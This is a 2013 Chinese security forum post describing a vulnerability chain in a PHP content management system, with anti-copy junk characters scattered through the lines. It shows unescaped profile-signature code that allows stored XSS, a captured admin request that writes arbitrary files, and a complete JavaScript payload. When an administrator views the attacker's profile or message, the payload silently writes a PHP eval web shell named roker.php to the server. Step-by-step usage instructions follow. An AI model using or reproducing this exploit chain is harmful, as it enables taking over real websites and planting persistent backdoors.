|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
- Q+ X/ p/ J, d: p. i7 N官网已经修补了,所以重新下了源码
6 U$ Q' S* f" ]% C因为 后台登入 还需要认证码 所以 注入就没看了。
9 d- O/ c6 {' I! i" C存在 xss9 Z0 r6 U/ N6 K, V: F! W% a
漏洞文件 user/member/skin_edit.php
5 k" m+ h2 e) c1 }本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
* u5 x! v8 S7 ?6 \! ^5 G6 H5 t 7 `7 J ^$ n+ W/ \* G+ h5 b7 Q
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
9 B1 l6 A* R" p3 q$ l # @% g; ~& K7 H0 W* p- J
</textarea></td></tr>, P$ C7 b3 d8 ]6 ]# U E! ~/ j
8 y+ K" F) S, O1 O$ U
user/do.php
7 g- i7 w T7 _/ b3 |, H& ~
H f: ~7 ~' ]0 \9 C2 A) Q
# J8 ^8 I- [% Q1 O. G6 Mif($op=='zl'){ //资料9 s, I/ I! P' S7 C) t- I3 d
7 b8 P9 y4 j& \: Q+ b R if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ! n) ]) X3 Q, P! E; d$ Q
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
" q" }" L: Q- n9 g! v; M
6 r+ V' X# l, s6 O! X $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
1 @9 j7 Y y5 R# p( c1 p
: y: ?1 k& T! G3 O. Z9 ]! e* B9 F$ w CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'$ h. V2 Q7 {: i% W) |
where CS_Name='".$cscms_name."'";
( t# R1 T7 {/ Z . g! T! e \9 }
if($db->query($sql)){
% H' u3 G( r; Y- l7 I) `
( a* }$ N, m% ` exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
0 L ?% c% t) F8 ~4 k3 E " y! ^8 }' N) ~9 _3 e
}else{
6 V; t0 K2 N) ?0 w $ i3 z4 G7 s$ X( f& D- V. J
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
6 V0 j9 T4 ^7 X/ e1 T , l3 H5 B7 B& R% l5 j9 a3 D3 v& r: [
}
5 M% W; d5 P( B$ H, n% N/ ]! R4 f
. s) }* o8 |$ U+ F, J0 p* j' ~& V5 x0 v Y. p, @7 b' G
没有 过滤导致xss产生。
2 h4 X2 n* [) B: x6 o1 q后台 看了下 很奇葩的是可以写任意格式文件。。4 Q) t6 J A6 [% N. z8 A. K+ ~5 M; U
抓包。。8 P8 n" t: t3 `& n2 H0 \ j& T7 d
# c' ^$ T: U" s, C( V
# d2 g# P, R' ]' R; d# g/ c本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
* |8 `+ U7 t4 Y- v 5 S# m! S3 D6 R( g1 G
Accept: text/html, application/xhtml+xml, */*$ z: `$ P }3 X [8 U
8 }. d3 H$ o- iReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
2 L- |- x2 A: N" i; \0 v" w3 l
" x' h1 X' i* K- UAccept-Language: zh-CN3 r0 s0 l9 f+ j, p* B3 w
* o% Z7 ]. M+ u( E1 j6 R' d
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' G" K. [) m# C- F
& ~5 l6 U6 g' ]& CContent-Type: application/x-www-form-urlencoded2 @2 h+ G" q8 X
1 ~+ A- C2 o2 ~- y- _
Accept-Encoding: gzip, deflate
x) _9 z! p7 F! R# ?: o9 P" b . f4 Y K q' k+ f1 b0 s
Host: 127.0.0.1
* ~! I& l d& ]: { . D: m% i ?! c8 m3 \( E3 ^4 [" X; [, X
Content-Length: 38
2 [! A% L8 T9 J8 r2 p$ {: _
3 Y& ~3 N0 _4 w1 D% q) r+ uDNT: 1
% d% m6 W; y$ i, x* n 0 h' ]% M$ ?+ Q7 z: J: p6 |
Connection: Keep-Alive- Z9 t, T5 I( C7 `
0 ~% S3 a0 V/ N) k4 x$ ?3 ~Cache-Control: no-cache* S& E2 o( W$ g+ y
7 G( @9 j7 R4 BCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594; K. S( x: @! w% R) S8 v
8 E, [7 S% s n! u6 Z
" K0 a0 B0 q3 s3 U+ @4 U! T" Iname=aaa.php&content=%3Cs%3E%3Ca%25%3E' l6 g! g8 O' d( C' L; M/ U9 H' `+ Z
& Q" p1 v i: S8 V+ t1 a1 o1 e6 J0 ~$ G3 y
4 N- b: P. u4 y- b" p0 A' Z于是 构造js如下。
- ]" r& s* a0 x' z/ {) J: E4 Y) j. C
本帖隐藏的内容<script>
5 q' M, w0 y: u5 V( S" J8 ~thisTHost = top.location.hostname;$ R1 J2 z4 O1 `
9 {$ ~* }+ d9 FthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";& E. D8 x( q( T
8 o% H+ }. |8 ?function PostSubmit(url, data, msg) {
2 R' W; }! [8 T7 ~* Z var postUrl = url;! \# o5 m* t' w, Y: x
- G2 @5 {5 S+ |2 Q j
var postData = data;
6 ]# x5 B3 a" L; M var msgData = msg;
: u% d( U0 G0 M2 l9 G var ExportForm = document.createElement("FORM");
& y+ Y- N5 r3 d" E! J" d9 s4 S document.body.appendChild(ExportForm); $ @- |9 F( {: Y
ExportForm.method = "POST"; 3 z9 G1 X0 }2 A4 d2 x+ l- x- n
var newElement = document.createElement("input");
; |0 y$ l2 e! j3 |1 e newElement.setAttribute("name", "name"); 8 [# l4 u, e* N8 o M+ L
newElement.setAttribute("type", "hidden"); ; H! r5 [ f$ k% r2 S
var newElement2 = document.createElement("input"); ' m8 X; I. e& F) d' y% `
newElement2.setAttribute("name", "content"); 4 O6 u2 V: `$ G4 R
newElement2.setAttribute("type", "hidden"); % o' f/ e& l( E2 Q" Y2 G+ h y
ExportForm.appendChild(newElement);
+ C8 ^: |5 o% `5 L0 w6 P% s; e ExportForm.appendChild(newElement2); % I y! g) l- |% K5 B) U; e
newElement.value = postData; . r" |- i6 A9 U. E' X9 u1 q) v2 [: R
newElement2.value = msgData;
- j& u9 k3 t3 X6 V" h$ |7 ~. N4 y ExportForm.action = postUrl; q) Z2 |% j3 \% P
ExportForm.submit();
. ^5 D4 f, W6 Y( x0 r$ Z$ y};
( b8 x; J8 d5 ?9 ?6 t ! ~- W7 A' w$ P" {
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");# @7 `4 X( J3 S" U, z
# [: t. d( o$ e0 I/ y/ \. X# |# h
</script>. H$ M0 f0 ~# H6 f8 \5 u( `6 n$ W
( |9 ^: B; W, E, _. ]5 b% K8 ?, U3 e
/ `7 r% c/ ^2 _' B8 I# j% [) shttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
) |* H7 j/ c5 b4 q) c# {( Y用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改); [4 _8 g3 [6 c" n# ~2 o
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
6 w+ W6 k/ k$ j; j8 c# T |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对